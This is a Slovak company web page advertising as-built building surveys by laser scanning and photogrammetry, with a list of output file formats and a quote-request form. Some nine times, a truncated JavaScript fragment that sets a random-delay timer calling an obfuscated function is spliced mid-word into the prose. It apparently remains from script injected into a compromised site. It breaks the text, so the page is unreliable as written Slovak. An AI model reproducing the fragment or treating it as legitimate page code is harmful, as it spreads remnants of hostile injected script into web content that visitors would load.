Zameranie skutkového stavu

Nechajte moderné technológie pracovať za vás. Vďaka kombinácii laserového skenovania a fotogrametrie získate presné podklady pre svoje projekty.

Dva laserové skenery pri skenovaní fasády.

Skenovanie v obtiažnych podmienkach na stavenisku.

Zameranie skutkového stavu je nevyhnutný podklad najmä pre prácu architektov a projektantov, inžinierov, konštruktérov, pamiatkárov a taktiež aj pre správcov budov. Dokumentáciu vyhotovujeme v digitálnej forme v 2D a 3D formátochandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}. Vieme pre Vás pripraviť aj prezentačný 3D model, ktorý je ľahko ovládateľný a prezentovateľný, napríklad vo formáte *.pdf. Presné podkladyandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);} sú už dnes prirodzenou súčasťou nie len priandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);} plánovaní stavbyandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}, ale aj v rámci kontrolných meraníandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);} behom výstavby.

Vďaka dlhodobej praxi a nazbieraným skúsenostiam Vám dokážeme ponúknuť presné a podrobné zameranieandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);} podľa Vašich potrieb. Pri zameraní skutkového stavu používame overené technológie ako je klasická geodézia, obľúbenú fotogrametriu ale aj najmodernejšie laserové skenovanie. Výkonný laserový skener (1 milión meraní za sekundu) dokáže presne zamerať aj členité a rozsiahle objekty, a to vrátane tých najmenších detailov.

Náš tím má bohaté skúsenostiandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);} so zameriavaním rôzne náročných priestorov, ako napr. byty a rodinné domy, členité podkrovia alebo aj samotné krovy, výrobné haly a priemyselné areály, ale aj historické pamiatky.

Nespornou výhodou zamerania, ktoré Vám ponúkame je, že všetky ďalšie potrebné merania sa dajú uskutočniť priamo na počítači, bez toho aby bolo potrebné opäť navštíviť daný objekt, čo môže výrazne ušetriť Vaše finančné nákladyandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}.

 

Fotoplán fasády budovy. Na fotorealistickom podklade je vektorová kresba.

Fotoplán fasády budovy. Na fotorealistickom podklade je vektorová kresba.

Rez modelom historickej budovy interpretovaným mračnom bodov.

Rez modelom historickej budovy interpretovaným mračnom bodov.

Prehľad dodávaných formátov:

RASTER / FOTOPLÁN / ORTOFOTO georeferencovné formáty *.jpg, *.png, *.tif
VEKTOR Microstation *.dgn
AutoCAD *.dwg, *.dxf
ESRI *.shp
3D MODEL 3D Max *.obj
Sketchup *.skp
výmenný formát *.ply
BIM Autodesk Revit *.rvt
výmenný formát *.ifc
POINTCLOUD  Microstation *.pod
AutoCAD *.rcp, *.rcs
výmenný formát *.e57, *.las
SFÉRICKÁ PANORÁMA rastrový formát *.jpg

Pozrite si ukážky našej práce

Podrobný pôdorys
Prelet mračnom bodov
Pohľad na zadnú fasádu
Vertikálny rez

Vyžiadajte si nacenenie!

Vaše meno a priezvisko (povinné)

Kontakt na vás (povinné)

Podrobnosti zakázky

Pripojiť prílohu

Údaje z formulára nám prídu do schránky. Po preštudovaní vás budeme spätne kontaktovať na uvedený kontakt, najneskôr do troch pracovných dní.

Do podrobností zakázky uveďte najmä čo od nás očakávate, spomeňte predpokladaný rozpočet a očakávaný termín dokončenia.

Ak máte k projektu relevantné podklady, pripojte ich ako prílohu – maximálne do veľkosti 10 MB.